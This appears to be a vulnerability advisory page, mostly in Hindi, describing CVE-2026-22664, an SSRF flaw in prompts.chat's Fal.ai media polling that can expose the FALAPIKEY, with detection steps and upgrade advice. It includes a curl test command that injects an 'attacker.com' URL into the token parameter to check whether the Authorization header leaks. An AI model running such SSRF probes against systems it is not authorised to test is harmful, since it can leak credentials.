प्लेटफ़ॉर्म
nodejs
घटक
prompts-chat
में ठीक किया गया
30a8f0470e0ba45e6be9c9f55220f4a9a6b91c99
CVE-2026-22664 prompts.chat में एक सर्वर-साइड रिक्वेस्ट फोर्जरी (SSRF) भेद्यता है। यह भेद्यता प्रमाणित उपयोगकर्ताओं को दुर्भावनापूर्ण URL प्रदान करके अनधिकृत बाहरी अनुरोध करने की अनुमति देती है, जिससे संवेदनशील जानकारी का खुलासा हो सकता है। यह भेद्यता prompts.chat के संस्करण 0.0.0 से 30a8f0470e0ba45e6be9c9f55220f4a9a6b91c99 तक प्रभावित करती है। संस्करण 30a8f0470e0ba45e6be9c9f55220f4a9a6b91c99 में इस समस्या का समाधान किया गया है।
इस SSRF भेद्यता का शोषण करने वाला एक हमलावर Fal.ai मीडिया स्टेटस पोलिंग फ़ंक्शन में दुर्भावनापूर्ण URL इंजेक्ट कर सकता है। यह उन्हें अनधिकृत बाहरी अनुरोध करने की अनुमति देगा। सबसे महत्वपूर्ण बात यह है कि हमलावर FALAPIKEY को Authorization हेडर में उजागर कर सकता है। इस API कुंजी के साथ, वे पीड़ित के Fal.ai खाते का दुरुपयोग कर सकते हैं, आंतरिक नेटवर्क को स्कैन कर सकते हैं और संवेदनशील डेटा तक पहुंच प्राप्त कर सकते हैं। इस भेद्यता का उपयोग आंतरिक सेवाओं तक पहुंचने या अन्य बाहरी प्रणालियों के साथ बातचीत करने के लिए भी किया जा सकता है, जिससे संभावित रूप से अधिक व्यापक समझौता हो सकता है।
CVE-2026-22664 को अभी तक सक्रिय रूप से शोषण करते हुए नहीं देखा गया है, लेकिन SSRF भेद्यता का दुरुपयोग करने की क्षमता के कारण यह चिंता का विषय है। इसकी गंभीरता CVSS स्कोर 7.7 (HIGH) है, जो संभावित प्रभाव को दर्शाता है। यह भेद्यता Node.js प्लेटफॉर्म को प्रभावित करती है। सार्वजनिक रूप से उपलब्ध प्रमाण-अवधारणा (PoC) अभी तक नहीं हैं, लेकिन SSRF भेद्यताओं का इतिहास बताता है कि हमलावर शोषण विकसित कर सकते हैं।
Organizations utilizing prompts.chat for internal communication or AI-powered chatbot applications are at risk. Specifically, deployments that rely on Fal.ai for media processing or storage are particularly vulnerable. Shared hosting environments where multiple users share the same prompts.chat instance should be carefully assessed, as a compromised account could impact other users.
• nodejs / server: Monitor application logs for outbound requests to unusual or unexpected domains. Use lsof or netstat to identify processes making outbound connections to suspicious IP addresses or ports.
lsof -i | grep prompts.chat• generic web: Use curl to test the media status polling endpoint with a crafted URL containing a known malicious domain. Examine the response headers for any signs of credential leakage.
curl -v 'https://your-prompts-chat-instance/api/media_status?token=https://attacker.com' 2>&1 | grep Authorizationdisclosure
एक्सप्लॉइट स्थिति
EPSS
0.03% (9% शतमक)
CISA SSVC
CVSS वेक्टर
CVE-2026-22664 को कम करने के लिए, तुरंत prompts.chat को संस्करण 30a8f0470e0ba45e6be9c9f55220f4a9a6b91c99 या बाद के संस्करण में अपग्रेड करें। यदि अपग्रेड करना तत्काल संभव नहीं है, तो एक वेब एप्लिकेशन फ़ायरवॉल (WAF) या प्रॉक्सी का उपयोग करके आउटबाउंड अनुरोधों को सीमित करने पर विचार करें। URL सत्यापन को मजबूत करने के लिए Fal.ai मीडिया स्टेटस पोलिंग फ़ंक्शन में इनपुट सत्यापन लागू करें। यह सुनिश्चित करें कि सभी API कुंजियाँ सुरक्षित रूप से संग्रहीत हैं और केवल अधिकृत उपयोगकर्ताओं द्वारा ही एक्सेस की जा सकती हैं। अपग्रेड के बाद, यह सुनिश्चित करने के लिए कि भेद्यता का समाधान हो गया है, मीडिया स्टेटस पोलिंग फ़ंक्शन के माध्यम से बाहरी URL के साथ अनुरोध करने का प्रयास करके सत्यापित करें।
prompts.chat को उस संस्करण में अपडेट करें जिसमें कमिट 30a8f0470e0ba45e6be9c9f55220f4a9a6b91c99 शामिल है। यह सुधार Fal.ai मीडिया स्टेटस पोलिंग के दौरान टोकन पैरामीटर में प्रदान किए गए URL को मान्य करता है, SSRF भेद्यता को कम करता है।
भेद्यता विश्लेषण और गंभीर अलर्ट सीधे आपके ईमेल में।
CVE-2026-22664 prompts.chat में एक सर्वर-साइड रिक्वेस्ट फोर्जरी (SSRF) भेद्यता है जो प्रमाणित उपयोगकर्ताओं को अनधिकृत बाहरी अनुरोध करने की अनुमति देती है, जिससे FALAPIKEY का खुलासा हो सकता है।
यदि आप prompts.chat के संस्करण 0.0.0 से 30a8f0470e0ba45e6be9c9f55220f4a9a6b91c99 का उपयोग कर रहे हैं, तो आप इस भेद्यता से प्रभावित हैं।
CVE-2026-22664 को ठीक करने के लिए, तुरंत prompts.chat को संस्करण 30a8f0470e0ba45e6be9c9f55220f4a9a6b91c99 या बाद के संस्करण में अपग्रेड करें।
CVE-2026-22664 को अभी तक सक्रिय रूप से शोषण करते हुए नहीं देखा गया है, लेकिन SSRF भेद्यता का दुरुपयोग करने की क्षमता के कारण यह चिंता का विषय है।
आधिकारिक सलाहकार के लिए, कृपया Fal.ai की सुरक्षा वेबसाइट देखें या उनके GitHub रिपॉजिटरी में कमिट इतिहास की जांच करें।
अपनी डिपेंडेंसी फ़ाइल अपलोड करें और तुरंत जानें कि यह CVE और अन्य आपको प्रभावित करती हैं या नहीं।